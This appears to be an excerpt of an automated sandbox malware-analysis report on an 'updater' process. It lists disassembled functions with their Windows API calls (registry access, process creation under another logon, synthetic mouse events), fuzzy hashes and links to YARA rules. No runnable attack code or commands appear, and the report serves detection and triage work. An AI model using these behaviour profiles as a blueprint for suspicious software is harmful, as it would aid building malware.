API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 72b729d3b94bfa5d8efcc4cf8fc7630a4497bbc7f375ef15bbd9f29c75de2c64
Instruction ID: 0bc35c20f7f06ebfaf4d294acb5b20fcd68c924d80fbdf673256706eeaea595f
Opcode Fuzzy Hash: 72b729d3b94bfa5d8efcc4cf8fc7630a4497bbc7f375ef15bbd9f29c75de2c64
Instruction Fuzzy Hash: 921193B2150219BEEF258F60CC85EEB7F5DEF09798F015214BB08A2050C6719C21DBA0

Function 017B784D Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 017B76B5: VirtualQuery.KERNEL32(?,?,0000001C), ref: 017B76D1
Part of subcall function 017B76B5: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 017B76F5
Part of subcall function 017B76B5: GetModuleFileNameA.KERNEL32(00BB0000,?,00000105), ref: 017B7710
Part of subcall function 017B76B5: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 017B77B4

CharToOemA.USER32(?,?), ref: 017B7884
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 017B78A1
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 017B78A7
GetStdHandle.KERNEL32(000000F4,017B7911,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 017B78BC
WriteFile.KERNEL32(00000000,000000F4,017B7911,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 017B78C2
LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 017B78E4
MessageBoxA.USER32(00000000,?,?,00002010), ref: 017B78FA

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 7cc889ddafe6dce40c13d7965e6bbe1d0df46baba3acc3205f8e799747109f70
Instruction ID: 28015a60743773c76e8e3adb1908350e1560eaef59c3062768b0b89f2698b885
Opcode Fuzzy Hash: 7cc889ddafe6dce40c13d7965e6bbe1d0df46baba3acc3205f8e799747109f70
Instruction Fuzzy Hash: 8B112AB2148206BEE210E6A4CCC9FDEF7ACAF95750F404A19B744D60D9DB74EA448B62

Function 00BD41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BD4282,?), ref: 00BD41D3
GetProcAddress.KERNEL32(00000000), ref: 00BD41DA
EncodePointer.KERNEL32(00000000), ref: 00BD41E6
DecodePointer.KERNEL32(00000001,00BD4282,?), ref: 00BD4203

Strings

combase.dll, xrefs: 00BD41CE
RoInitialize, xrefs: 00BD41C2

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 4d833ff665d77d29b6c7fbe7c95e5089a1fc352f50a61530cb3c75a42a911820
Instruction ID: 7bf996c05d54ea48413b8cddcaab7992363579c535fceb120ec68be6fa33a7ff
Opcode Fuzzy Hash: 4d833ff665d77d29b6c7fbe7c95e5089a1fc352f50a61530cb3c75a42a911820
Instruction Fuzzy Hash: 19E0E578A90741AFEF205F70ED4EB0C3AA4B752B07FA04424BA05E51A0DBF544848E00

Function 00BD428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BD41A8), ref: 00BD42A8
GetProcAddress.KERNEL32(00000000), ref: 00BD42AF
EncodePointer.KERNEL32(00000000), ref: 00BD42BA
DecodePointer.KERNEL32(00BD41A8), ref: 00BD42D5

Strings

RoUninitialize, xrefs: 00BD4297
combase.dll, xrefs: 00BD42A3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 54507af664a83fc59b845d60766af699d8284dfd81130130ccbfa5ab12dfa856
Instruction ID: b72d058ec9a3294b74060f74565c4a8064d3fae8bc41bc234a6e23ba639d8edb
Opcode Fuzzy Hash: 54507af664a83fc59b845d60766af699d8284dfd81130130ccbfa5ab12dfa856
Instruction Fuzzy Hash: 55E0B674AA0B00ABEB109F60AD0DB4D3AA8B741B03FA00529F605D51F0DBF44584CA10

Function 00BB218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BB21B8
GetWindowRect.USER32(?,?), ref: 00BB21F9
ScreenToClient.USER32(?,?), ref: 00BB2221
GetClientRect.USER32(?,?), ref: 00BB2350
GetWindowRect.USER32(?,?), ref: 00BB2369

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 631d42049510ec38424a8ff81a912294a525093c4da47d84dc9f634c4d8da590
Instruction ID: e98aec80c151a2aebb8365d4a19832d2c0d749a6f3ddf9a3fd6c329dfedbb7c5
Opcode Fuzzy Hash: 631d42049510ec38424a8ff81a912294a525093c4da47d84dc9f634c4d8da590
Instruction Fuzzy Hash: 56B1393990024ADBDF10CFA9C580BEEB7F1FF08310F1485A9ED59AB254DB74A950CB64

Function 00C16A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C16BC6
_memmove.LIBCMT ref: 00C16B01

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

_memmove.LIBCMT ref: 00C16B74
_memmove.LIBCMT ref: 00C16C5B
_memmove.LIBCMT ref: 00C16C74
_memmove.LIBCMT ref: 00C16C90

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: c0640e279a218e1c815cf920c8e0d6ce61dbb8ff43003e1f4124e81956b67da1
Instruction ID: 2ed179a34797145281e2dbd5d7c087de7e72935cf33f714454f666d389f78f10
Opcode Fuzzy Hash: c0640e279a218e1c815cf920c8e0d6ce61dbb8ff43003e1f4124e81956b67da1
Instruction Fuzzy Hash: BC61A23150025AABCF11EF64CC91EFE77A8EF06304F044599F8996B292DB749D45EB50

Function 00C30844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C3147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3040D,?,?), ref: 00C31491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C30980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C309A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C309EC
RegCloseKey.ADVAPI32(00000000), ref: 00C309F9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7d097421af638208ca85ee26ce426532c466b1958c56d0072f5c8749bc9f4d8b
Instruction ID: 7a580457a1fcb812b00f548454b09da44e9864d127f8b82468d181c2342ecea2
Opcode Fuzzy Hash: 7d097421af638208ca85ee26ce426532c466b1958c56d0072f5c8749bc9f4d8b
Instruction Fuzzy Hash: 06515532218300AFD714EB64C895F6EBBE9FF85310F14495DF5998B2A2DB31E905CB52

Function 00C35DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C35E38
GetMenuItemCount.USER32(00000000), ref: 00C35E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C35E97
GetMenuItemID.USER32(?,?), ref: 00C35F06
GetSubMenu.USER32(?,?), ref: 00C35F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C35F65

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 15645042209f9276442e9488099dd160a196bdab080d91d2cf0d3f292617feab
Instruction ID: 19db24be083e07f35101fcfd75d6256c1d03ccf04fd3a108ac364936853a3205
Opcode Fuzzy Hash: 15645042209f9276442e9488099dd160a196bdab080d91d2cf0d3f292617feab
Instruction Fuzzy Hash: 8051AB75A00A15AFCB11EFA4C845AAEBBF5EF48310F1040A9F911BB391DB74AE418B90

Function 00C0F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C0F6A2
VariantClear.OLEAUT32(00000013), ref: 00C0F714
VariantClear.OLEAUT32(00000000), ref: 00C0F76F
_memmove.LIBCMT ref: 00C0F799
VariantClear.OLEAUT32(?), ref: 00C0F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C0F814

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 5f8283547b01850ca657336fe18adcf930e691c13e8d3482cb436f039a53c88b
Instruction ID: 83b5bca5974db7e2f63e2d84ba39cb2e9732814873c90ad7320878eebedfe6ac
Opcode Fuzzy Hash: 5f8283547b01850ca657336fe18adcf930e691c13e8d3482cb436f039a53c88b
Instruction Fuzzy Hash: B0514D75A00209EFCB24CF58C884AAAB7F8FF4D314B15856AEA59DB341D730E951CFA0

Function 00C129B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C129FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12A4A
IsMenu.USER32(00000000), ref: 00C12A6A
CreatePopupMenu.USER32 ref: 00C12A9E
GetMenuItemCount.USER32(000000FF), ref: 00C12AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C12B2D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ded37e4977dcf710d6b799293e85573f3f1ccf358108f2db25b182774ecec6b8
Instruction ID: c2cd4f2d10231374325fee52853c8c1d7a217b224cf21628c9e8a6866b084b95
Opcode Fuzzy Hash: ded37e4977dcf710d6b799293e85573f3f1ccf358108f2db25b182774ecec6b8
Instruction Fuzzy Hash: A051C078604349DFDF25CF68D888BEEBBF4EF06314F104159E8229B291D7709AA4EB51

Function 00BB1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00BB1B76
GetWindowRect.USER32(?,?), ref: 00BB1BDA
ScreenToClient.USER32(?,?), ref: 00BB1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB1C08
EndPaint.USER32(?,?), ref: 00BB1C52

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 26c6af63b3ec52f01517860d93f443b80453095adb8f2f741252d07554ea3bb0
Instruction ID: fb08bedceabaa0c9362346efc297f186b8fd7b545683dbdaa8342c1544bb3b25
Opcode Fuzzy Hash: 26c6af63b3ec52f01517860d93f443b80453095adb8f2f741252d07554ea3bb0
Instruction Fuzzy Hash: 6541B3311043049FD711DF29CC98FBA7BF8FB45360F140AA9F9999B2A1C7709845DB62

Function 00C27788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C2550C,?,?,00000000,00000001), ref: 00C27796

Part of subcall function 00C2406C: GetWindowRect.USER32(?,?), ref: 00C2407F

GetDesktopWindow.USER32 ref: 00C277C0
GetWindowRect.USER32(00000000), ref: 00C277C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C277F9

Part of subcall function 00C157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C15877

GetCursorPos.USER32(?), ref: 00C27825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C27883

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 7f5d003dd0bcfa8255b91ade998ad43aaf89cfac3ebb2511e2faf7ba9bade012
Instruction ID: 7a3a40be60cdf4f6eece8bd8fae23460e23a17e8a019938473a586ddb29a1b5c
Opcode Fuzzy Hash: 7f5d003dd0bcfa8255b91ade998ad43aaf89cfac3ebb2511e2faf7ba9bade012
Instruction Fuzzy Hash: D431D272508315ABD720DF14D849F9FB7E9FF89314F100919F995A7181DB31EA48CB92

Function 00C09431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C08CDE
Part of subcall function 00C08CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C08CE8
Part of subcall function 00C08CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C08CF7
Part of subcall function 00C08CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C08CFE
Part of subcall function 00C08CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C08D14

GetLengthSid.ADVAPI32(?,00000000,00C0904D), ref: 00C09482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C0948E
HeapAlloc.KERNEL32(00000000), ref: 00C09495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C094AE
GetProcessHeap.KERNEL32(00000000,00000000,00C0904D), ref: 00C094C2
HeapFree.KERNEL32(00000000), ref: 00C094C9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 8d9ae9d6349d0aa355e3bed9e67e35899cbb2cb6d8c63668e47edb9cbc133298
Instruction ID: 8600251a32d88c2f3f7a6be643c8c8fa66f0dcc6621f6a5f071c8f43c5b6c01d
Opcode Fuzzy Hash: 8d9ae9d6349d0aa355e3bed9e67e35899cbb2cb6d8c63668e47edb9cbc133298
Instruction Fuzzy Hash: C311BE76941604FFDB109FA4CC09BAF7BA9FB46316F208158F98597251C7369A06CB60

Function 00C091CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C09200
OpenProcessToken.ADVAPI32(00000000), ref: 00C09207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C09216
CloseHandle.KERNEL32(00000004), ref: 00C09221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C09250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C09264

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 2983f9de5d49ccaf0bbf712ec2bdf4cdb060be88aec5f63334b6ced92f41e2d3
Instruction ID: 63e2577d720512269b26a1a5ae566f0ee03a4e0991b43c8af647a25576f0ae6d
Opcode Fuzzy Hash: 2983f9de5d49ccaf0bbf712ec2bdf4cdb060be88aec5f63334b6ced92f41e2d3
Instruction Fuzzy Hash: CD11447664120AABDB118FA4ED49BDE7BA9FB09314F144024FE05A21A1C2769E60EB61

Function 00C0C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C0C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C0C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C0C366
ReleaseDC.USER32(00000000,00000000), ref: 00C0C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C0C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00C0C397

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 16b475ed651bddcbfbbf1d493a4116865a71b0f224342049da8f68522cd8ff88
Instruction ID: d934066ca4f0b0d088009df78b531fc8552c18db57f37d64417112f63de849a8
Opcode Fuzzy Hash: 16b475ed651bddcbfbbf1d493a4116865a71b0f224342049da8f68522cd8ff88
Instruction Fuzzy Hash: 29012175E40218BBEB109BA59C49B9EBFA8EB49751F104165FE08A7290D6709910CFA0

Function 00C3C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BB16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB1729
Part of subcall function 00BB16CF: SelectObject.GDI32(?,00000000), ref: 00BB1738
Part of subcall function 00BB16CF: BeginPath.GDI32(?), ref: 00BB174F
Part of subcall function 00BB16CF: SelectObject.GDI32(?,00000000), ref: 00BB1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C3C57C
LineTo.GDI32(00000000,00000003,?), ref: 00C3C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C3C59E
LineTo.GDI32(00000000,00000000,?), ref: 00C3C5AE
EndPath.GDI32(00000000), ref: 00C3C5BE
StrokePath.GDI32(00000000), ref: 00C3C5CE

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: baa141654e4f78776c3dfee823aefb27254a018a39c28178a573d3c2a5d8502d
Instruction ID: 2a4b61db5ef1bce1a856961b6e04ad34f24665d400ff5ea2a75a77c211d432cd
Opcode Fuzzy Hash: baa141654e4f78776c3dfee823aefb27254a018a39c28178a573d3c2a5d8502d
Instruction Fuzzy Hash: C711097604010CBFDB129F90DC88FAE7FADFB09354F148051BA189A1A1C771AE95EBA0

Function 00BD07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BD07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BD07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BD07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BD080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BD0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD081A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

